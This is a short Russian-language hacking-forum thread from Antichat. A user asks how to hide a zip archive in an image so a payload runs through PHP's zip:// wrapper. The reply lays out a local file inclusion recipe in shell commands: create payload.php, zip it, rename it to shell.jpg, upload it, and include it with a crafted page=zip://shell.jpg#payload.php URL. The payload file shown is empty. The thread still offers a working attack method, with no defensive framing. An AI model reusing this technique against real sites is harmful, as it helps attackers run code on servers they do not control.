ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Нужно создать zip для для запуска полезной нагрузки (https://forum.antichat.xyz/showthread.php?t=580618)

WallHack 29.09.2022 17:14

Всем привет! Нужно создать zip архив с папкой и файлом внутри спрятанный в картинке таким образом что бы он сработал при запуски через wrapper zip://
Возможно?

Exited3n 30.09.2022 13:33

LFI с wrapper ZIP делается примерно так:
Wrapper zip://
  1. Create an evil payload: echo "" > payload.php;
  2. Zip the file

Bash:


Код:

zip
payload.zip payload.php
;
mv
payload.zip shell.jpg
;
rm
payload.php

  1. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg#payload.php


Время: 17:24